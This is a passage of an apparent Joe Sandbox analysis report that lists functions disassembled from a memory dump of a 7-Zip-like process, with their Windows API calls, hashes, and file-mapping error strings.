                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4236320881-0
                                                                                                                                        • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                        • Instruction ID: 1d3deab5b369b879539e998468b756a033ff09a0e287e80a8e11f871e80825b1
                                                                                                                                        • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                        • Instruction Fuzzy Hash: 1511A91A22878182D3718B15E540769A360E7847E4F644320EFDA577E4EF7CCDD5D705
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00248A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00248E1D), ref: 00248A99
                                                                                                                                          • Part of subcall function 00248A60: GetLastError.KERNEL32(?,?,00000003,?,00248E1D), ref: 00248AA6
                                                                                                                                        • SetEndOfFile.KERNELBASE ref: 00248CC7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ErrorLastPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 841452515-0
                                                                                                                                        • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                        • Instruction ID: 4de468eae39aa67691fc3e127fafed266a7835c7d70c108d42bafe934ab16b31
                                                                                                                                        • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                        • Instruction Fuzzy Hash: E3E02612331494C2E728AFA1E5C566E8310AB44BE0F488032AB8943B489EA98CEA8710
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00246464: FreeLibrary.KERNELBASE(?,?,?,002464E7), ref: 00246475
                                                                                                                                        • LoadLibraryExW.KERNELBASE ref: 002464F4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$FreeLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 534179979-0
                                                                                                                                        • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                        • Instruction ID: a837f65d93566ce35d6a951258bc22c7deced58386448ea169ca22c2077ed325
                                                                                                                                        • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                        • Instruction Fuzzy Hash: 65D02E2171172186FE282BA6694936803002F06FE0E88C0309E0E03300DE680CFBA700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                        • Instruction ID: ae7420c81a6513d7a24db434d497f1abb115825cc1afd818f73f1c7b47c157d1
                                                                                                                                        • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                        • Instruction Fuzzy Hash: 1FE0467A324640CBE740CF60E408B4AB3A0F388B24F104124DE8E83B54DBBCC044CF40
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNELBASE(?,?,?,002464E7), ref: 00246475
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                        • Instruction ID: ff127581c51d081d1398c358558b9b999f85b627d476bf06b8d7233ecb0d8355
                                                                                                                                        • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                        • Instruction Fuzzy Hash: 88D012AA712545C5FF694FA2E85C33523546B59F54F5C5010CE194A240EF2988A58761
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                        • Instruction ID: 84ba49a00228f5666d8f3f53a44facf83d0c224771d0768265fca9de4a250dc6
                                                                                                                                        • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                        • Instruction Fuzzy Hash: A1D0177A614684C6E7008F60E04975AF764F388B64F484004EA8806768CBBCC199CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1795875747-0
                                                                                                                                        • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                        • Instruction ID: d24c4aa32b760bd10f6c57ae0daed0166ec6b246692a3675633295a7954dde87
                                                                                                                                        • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                        • Instruction Fuzzy Hash: 1BD0A7D571074881CE109726D4042692321B748BC4F048021DD9D07318DD2CC1548B00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFind
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                        • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                        • Instruction ID: ea9910d8824518af4e29b35dd26de667d1e0790377835c43c0ce0ab2c0f2de3d
                                                                                                                                        • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                        • Instruction Fuzzy Hash: E2D0C77561994581DB251F79944436413519B54F74F284310C9B4493E4DF2984968711
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1425588814-0
                                                                                                                                        • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                        • Instruction ID: ef1b3fa852de12183be37b12c4c9c42302acfcb85c4fdc21e8a52974232ac1f4
                                                                                                                                        • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                        • Instruction Fuzzy Hash: 5EB09224B12400C2CB0C6722D89A31C13606788B21FE18429C50FD5650DD1C85E94700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                        • Instruction ID: 99788dc41d19b609908a46fb5b705447b510a3d427dd5f7c6efafe6ac2e4f42b
                                                                                                                                        • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                        • Instruction Fuzzy Hash: 322148B372424196C725DE1AF84065BB294F749BA4F245224FE5A47784EB78C9E2CB80
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                        • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                        • Instruction ID: 2200c2a41f7319165a6563c6e55875a83db2d4c30580766fee260136212c8f80
                                                                                                                                        • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                        • Instruction Fuzzy Hash: D4112772737652B6CBBC8F6CA4502386250B704780B748036DACA87A10EABACCB29301
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0026419C: free.MSVCRT ref: 002641B9
                                                                                                                                          • Part of subcall function 0026419C: free.MSVCRT ref: 002641C5
                                                                                                                                          • Part of subcall function 0026419C: free.MSVCRT ref: 002641D1
                                                                                                                                          • Part of subcall function 0026419C: free.MSVCRT ref: 002641DD
                                                                                                                                          • Part of subcall function 0026419C: free.MSVCRT ref: 002641E6
                                                                                                                                          • Part of subcall function 0026419C: free.MSVCRT ref: 002641EF
                                                                                                                                          • Part of subcall function 0026419C: free.MSVCRT ref: 002641F8
                                                                                                                                        • free.MSVCRT ref: 00273F45
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                        • Instruction ID: a8b7b7d10767dc7a8c757624d4912c20acfe4694203f2968923ac480f64d0bf4
                                                                                                                                        • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                        • Instruction Fuzzy Hash: 48012973A21390CAC7219F1DC18116DBB64F759FE83689116EB4907760E732C883C7A1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                        • Instruction ID: a55007ded5102a8ddcee83d8f39bd05e2fc4bc320c65733653e06cd761f4396d
                                                                                                                                        • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                        • Instruction Fuzzy Hash: 9E016D7632624086E710CF15C56C35E3BB0B7D5B68F140208DBA84B3D5C7BAC54ACF94
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                        • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                        • Instruction ID: fc57eed97ed104e8f20645a65a9ed7235a6099fa0f68303472a7676d633fdb24
                                                                                                                                        • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                        • Instruction Fuzzy Hash: 4AF0EC6233114947CB489F7DD5C12682161FB44799FB05439DF4587601E968CCB99714
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 002489D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 002489EA
                                                                                                                                        • GetLastError.KERNEL32 ref: 0024CB49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                        • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                        • Instruction ID: 32fda09827d685982f518e30f5fc2c65c7e508e398240068c5a02845c7b35469
                                                                                                                                        • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                        • Instruction Fuzzy Hash: B7D02B4077108186DB946EBD4CC133C00C1E718B0AFF01435DD5BC6202E8188CE9632A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2162964266-0
                                                                                                                                        • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                        • Instruction ID: 1422a7473a40e02360e771a3003ddfd7ea6871b9b70261e22480eab8743ec8c8
                                                                                                                                        • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                        • Instruction Fuzzy Hash: 3ED05EAA7516C886CA04AB27D68151DA3219B88FD4748D0249F080BB4ADE20C8E98B40
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 002489EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                        • Instruction ID: 6638c25622291e228fbcbbb2d4611d4b5328a62d610322d73e61a241dd98eaaa
                                                                                                                                        • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                        • Instruction Fuzzy Hash: 19D0A772621D4580DB291F7EC8443381350A714F74F184310CAB54A3D0EF2489D68301
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                        • Instruction ID: 80dfb5a42083bf303cb94a44d57c8a1fcfe393e1fd7947723c858a2bd54f49fc
                                                                                                                                        • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                        • Instruction Fuzzy Hash: 37C080017D324442C54D251F1F4633C41450F897D1E5C40205E4C07753DE5448F54F00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                                                                                        • API String ID: 1534225298-798110030
                                                                                                                                        • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                        • Instruction ID: 545ff08111b73f5ca3555cb15fade03477dc1b13f7c79a58f42fe088ba566ced
                                                                                                                                        • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                        • Instruction Fuzzy Hash: 4CC18F76235A80C6CB58EF11E98475EB764FBC1B90F944131FA8E43A69DF78C4A9CB40
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
